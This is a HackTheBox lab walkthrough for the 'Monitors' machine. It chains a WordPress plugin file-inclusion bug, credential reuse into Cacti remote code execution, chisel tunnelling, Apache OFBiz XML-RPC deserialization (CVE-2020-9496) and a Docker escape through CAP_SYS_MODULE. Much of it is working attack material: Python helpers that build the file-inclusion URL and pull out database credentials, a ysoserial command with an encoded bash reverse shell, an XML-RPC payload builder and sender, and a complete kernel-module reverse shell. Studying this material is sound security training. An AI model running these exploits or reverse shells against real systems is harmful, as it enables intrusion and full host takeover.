HackTheBox - Monitors

Last updated 4 years ago
This box is one of my favourites because it chains several CVE-tracked vulnerabilities, i.e. bugs found in real-world software rather than invented for the lab. So let's get started.

Nmap scan results

nmap -A -T4 -p- -oA nmap-allport 10.10.10.238

It's always good to scan all ports. I will add monitors.htb to the /etc/hosts file.

Enumerating Wordpress

I will use the wpscan tool, which can identify potentially vulnerable plugins and probable usernames.

wpscan --url http://monitors.htb/ --enumerate u,vp

The tool did not report any vulnerable plugins, so I will browse the plugin directory manually. It is located at /wp-content/plugins/

WP Spritz Plugin (Vulnerable to LFI)

Browsing /wp-content/plugins/ reveals the WP with Spritz plugin, which has a public Exploit Database entry ("WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion"): the value of its url parameter is included without sanitisation, so it can be used to read arbitrary local files. We can FUZZ the url parameter with an LFI wordlist or try candidates by hand. The first things to try are Apache log poisoning and the old-school tricks; these gave us nothing here. The next thing to look at is the apache2.conf file, and after that wp-config.php, which usually holds the database username and password.

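The two helpers a practitioner wants at this stage, as an added example that is not part of the original write-up: one that forms the LFI request, and one that pulls the DB_* settings out of a wp-config.php returned through it. The plugin script path is an assumption taken from the public WP with Spritz advisory, the docroot is a guess, and the wp-config.php text is constructed, not the box's file.

```python
"""Added example (not from the original write-up): helpers for the LFI stage.
build_lfi_url() forms the request that makes the plugin read a local file,
and parse_wp_config() pulls the database settings out of a wp-config.php
that comes back through it. The plugin script path is an ASSUMPTION taken
from the public WP with Spritz advisory; the docroot path is a guess."""
import re
from urllib.parse import urlencode

# ASSUMPTION: script and GET parameter of the vulnerable plugin.
SPRITZ_SCRIPT = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"

# Files worth reading first through an LFI on a WordPress host.
LFI_TARGETS = {
    "passwd": "/etc/passwd",
    "apache": "/etc/apache2/apache2.conf",
    "wp_config": "/var/www/wordpress/wp-config.php",   # ASSUMPTION: docroot
}


def build_lfi_url(base: str, path: str, traversal_depth: int = 0) -> str:
    """URL that feeds *path* to the plugin's url parameter.

    An absolute path works when the value goes straight into an include;
    traversal_depth prepends that many '../' for the case where the value is
    joined onto a base directory first (fuzzing normally tries both forms)."""
    if traversal_depth:
        target = "../" * traversal_depth + path.lstrip("/")
    else:
        target = path
    return base.rstrip("/") + SPRITZ_SCRIPT + "?" + urlencode({"url": target})


# define('DB_PASSWORD', 'secret');  -- tolerates either quote style and spaces
_WP_DEFINE = re.compile(
    r"""define\(\s*['"](DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)['"]\s*,\s*['"]([^'"]*)['"]\s*\)"""
)


def parse_wp_config(source: str) -> dict:
    """Return the DB_* settings found in wp-config.php source text."""
    return dict(_WP_DEFINE.findall(source))


def is_passwd_file(body: str) -> bool:
    """Cheap check that an LFI response really is /etc/passwd and not an
    error page: the root entry is always present and always first."""
    return bool(re.match(r"root:[^:]*:0:0:", body))


# Constructed sample of what the LFI returns for wp-config.php (not the box's file).
SAMPLE_WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpadmin' );
define( 'DB_PASSWORD', 'example_pass_2020!' );
define( 'DB_HOST', 'localhost' );
$table_prefix = 'wp_';
"""

if __name__ == "__main__":
    print(build_lfi_url("http://monitors.htb", LFI_TARGETS["wp_config"]))
    creds = parse_wp_config(SAMPLE_WP_CONFIG)
    print(f"{creds['DB_USER']}:{creds['DB_PASSWORD']}")
```

The is_passwd_file check matters more than it looks: a WordPress 404 page returns HTTP 200, so status codes alone do not tell you whether the include worked.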
Discovering cacti-admin.monitors.htb (Virtual host)

There is also a second virtual host, cacti-admin.monitors.htb. Add it to the /etc/hosts file.

We have the credentials from wp-config.php, so it is worth trying the password with default usernames such as admin, administrator or guest on the Cacti login. I tried admin : BestAdministrator@2020! and it worked (lucky).

Exploiting Cacti (SQLi/ Remote Code Execution)

The Cacti version in use is 1.2.12. Searching Google for known vulnerabilities in that version turns up an authenticated SQL injection that can be chained into remote code execution.

Read the write-up to understand the misconfiguration the exploit relies on, then download it. It needs valid Cacti credentials, which we have.

Docker Enumeration (Scanning for hosts)

After getting the shell I was stuck for a long time. Eventually I noticed a Docker bridge interface in the ifconfig output and moved on to enumerating the Docker network.

To look for other hosts on the Docker interface I pulled a static nmap binary over from my machine with netcat (curl and wget are not installed on the system).

nmap can scan the ports too, but I like the following pure-bash script, which is comparatively fast and needs nothing beyond bash:

#!/bin/bash
# Pure-bash TCP port scanner: no nmap needed, it uses bash's /dev/tcp pseudo-device.

if [[ $# -eq 0 ]]; then
        echo "[-] Supply IP Address"
        exit 1
fi
ip=$1

for i in $(seq 1 65535); do
        # A failed connect prints an error to stderr; silence it and report
        # only successes. timeout stops filtered ports from hanging the loop
        # (drop it if the target lacks coreutils' timeout).
        if timeout 1 bash -c "echo > /dev/tcp/$ip/$i" 2>/dev/null; then
                echo "[+] Port open: $i"
        fi
done

Forwarding the ports to our local machine using chisel

Now I will forward these ports to my local machine using chisel (prebuilt binaries are published on the project's GitHub releases page). The server runs on my machine in reverse mode; each client on the remote box opens a reverse tunnel so that a port on my loopback interface reaches the service on the target's loopback interface:

./chisel server --reverse -p 9002                           (my local machine)
./chisel client 10.10.14.44:9002 R:8443:127.0.0.1:8443 &    (remote machine)
./chisel client 10.10.14.44:9002 R:8081:127.0.0.1:8080 &    (remote machine; remote 8080 becomes local 8081)

Apache OFBiz is running on port 8443; we can confirm that by browsing to https://127.0.0.1:8443/catalog through the tunnel. Apache OFBiz is an open source enterprise resource planning (ERP) system: a suite of enterprise applications that integrate and automate many business processes. It is an Apache Software Foundation top-level project.

Exploiting Apache OFBiz XMLRPC Deserialization (RCE)

We can look for known vulnerabilities on Google. The running version is 17.12.01, visible in the process listing (ps aux shows the java command line of the OFBiz process).

The Zero Day Initiative advisory "CVE-2020-9496: RCE in Apache OFBiz XMLRPC via Deserialization of Untrusted Data" fits this version. To exploit it we send a request to /webtools/control/xmlrpc carrying a malicious serialized Java object inside the XML-RPC <serializable> extension element; the endpoint deserializes it without authentication.

Intercept a request to that path in Burp, change the request method to POST, set the Content-Type header to application/xml, and use the following body:

<?xml version="1.0"?>
<methodCall>
    <methodName>ProjectDiscovery</methodName>
    <params>
        <param>
            <value>
                <struct>
                    <member>
                        <name>test</name>
                        <value>
                            <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">
                                [Malicious Serialized Data]
                            </serializable>
                        </value>
                    </member>
                </struct>
            </value>
        </param>
    </params>
</methodCall>
To generate the serialized data I will use ysoserial.jar, which builds gadget-chain payloads for Java deserialization. The CommonsBeanutils1 chain below runs a bash reverse shell; the base64 string in the command decodes to bash -i >& /dev/tcp/10.10.14.44/1337 0>&1, and the output is base64-encoded once more so it can sit inside the XML:

java -jar ysoserial.jar CommonsBeanutils1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40NC8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}' | base64 -w 0

Paste the output in place of [Malicious Serialized Data] in Burp and send the request. Make sure a listener is running on the port you chose (1337 above).
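The request above assembled programmatically, as an added example that is not part of the write-up, the ZDI advisory or the OFBiz project. It takes the raw bytes that ysoserial writes to stdout and applies base64 exactly once, and it refuses input that is not a Java serialization stream, since a double-encoded blob is the usual reason this exploit fails silently. The method and member names are arbitrary, the sample bytes are constructed and are not a gadget chain.

```python
"""Added example (not from the write-up, ZDI or the OFBiz project): build the
XML-RPC request that smuggles a Java serialized object through the
<serializable> extension element, the vector of CVE-2020-9496."""
import base64
import http.client
import ssl
import xml.etree.ElementTree as ET

XMLRPC_EXT_NS = "http://ws.apache.org/xmlrpc/namespaces/extensions"
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"   # first 4 bytes of every Java serialization stream


def build_xmlrpc_payload(serialized: bytes, method: str = "ProjectDiscovery",
                         member: str = "test") -> bytes:
    """Wrap raw ysoserial output in the methodCall envelope.

    Takes the raw bytes (what 'java -jar ysoserial.jar ...' writes to stdout),
    not already-base64 text: base64 is applied exactly once here."""
    if not serialized.startswith(JAVA_STREAM_MAGIC):
        raise ValueError("expected raw Java serialized bytes (ACED0005 header)")
    call = ET.Element("methodCall")
    ET.SubElement(call, "methodName").text = method
    params = ET.SubElement(call, "params")
    struct = ET.SubElement(ET.SubElement(ET.SubElement(params, "param"), "value"), "struct")
    mem = ET.SubElement(struct, "member")
    ET.SubElement(mem, "name").text = member
    # The extension namespace is what makes Apache XML-RPC deserialize the body.
    ser = ET.SubElement(ET.SubElement(mem, "value"), "serializable", {"xmlns": XMLRPC_EXT_NS})
    ser.text = base64.b64encode(serialized).decode("ascii")
    return b'<?xml version="1.0"?>' + ET.tostring(call)


def extract_serialized(xml_body: bytes) -> bytes:
    """Inverse of build_xmlrpc_payload: pull the object back out of a request
    (useful for checking what Burp is about to send, or for a detection rule
    that flags <serializable> elements in this namespace)."""
    root = ET.fromstring(xml_body)
    node = root.find(f".//{{{XMLRPC_EXT_NS}}}serializable")
    if node is None:
        raise ValueError("no <serializable> element in the extension namespace")
    return base64.b64decode(node.text.strip())


def send_payload(host: str, port: int, body: bytes,
                 path: str = "/webtools/control/xmlrpc") -> int:
    """POST the envelope over HTTPS and return the status code. The tunnelled
    service has a self-signed certificate, so verification is disabled; the
    shell, if the gadget fired, arrives out of band on your listener."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, port, context=ctx, timeout=15)
    conn.request("POST", path, body=body, headers={"Content-Type": "application/xml"})
    status = conn.getresponse().status
    conn.close()
    return status


if __name__ == "__main__":
    # Constructed stand-in for ysoserial output; a real run would do
    # build_xmlrpc_payload(open("payload.ser", "rb").read()).
    demo = build_xmlrpc_payload(JAVA_STREAM_MAGIC + b"constructed-not-a-real-gadget")
    print(demo.decode())
```

Note that the server replies with a fault either way; a 200 with an XML-RPC fault body is normal even when the shell has already connected back.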

Escaping docker using SYS_MODULE Capability

Checking the capabilities of our new shell (capsh --print, or the CapEff line of /proc/self/status) shows that it has cap_sys_module.

CAP_SYS_MODULE lets a process load and unload kernel modules (the init_module, finit_module and delete_module system calls) from any path. A container shares the host's kernel, so a module loaded from inside the container runs in the host kernel with full privileges; nothing in the container's namespaces or seccomp profile contains it once it is loaded.

We can exploit this to get root on the host: build a kernel module that spawns a reverse shell and insert it from the container. The Medium article "Abusing SYS_MODULE capability to perform Docker container breakout" walks through the same approach.

// Reverse shell - I named it shell.c. Loaded from the container with CAP_SYS_MODULE,
// it executes in the HOST kernel, so the shell it spawns is root on the host.
#include <linux/init.h>
#include <linux/kmod.h>
#include <linux/module.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

// Connect back to 172.17.0.2:4444, our container's address on the docker bridge.
static char *argv[] = {"/bin/bash", "-c", "bash -i >& /dev/tcp/172.17.0.2/4444 0>&1", NULL};
static char *envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL};

// Runs at insmod time: ask the kernel's usermode helper to spawn the shell as root.
static int __init reverse_shell_init(void)
{
        return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void)
{
        printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

// Makefile (the recipe lines must be indented with a tab)
obj-m += shell.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

The container shares the host's kernel, so uname -r inside it reports the host's kernel version; the module must be built against headers for exactly that version (in the container if they are installed, otherwise on a machine with matching headers, then copied over). Before inserting it, start a listener on port 4444 at 172.17.0.2, the address hard-coded in shell.c, so the host-side shell has something to connect to.

Then insert the module with insmod shell.ko; the root shell from the host lands on the listener.
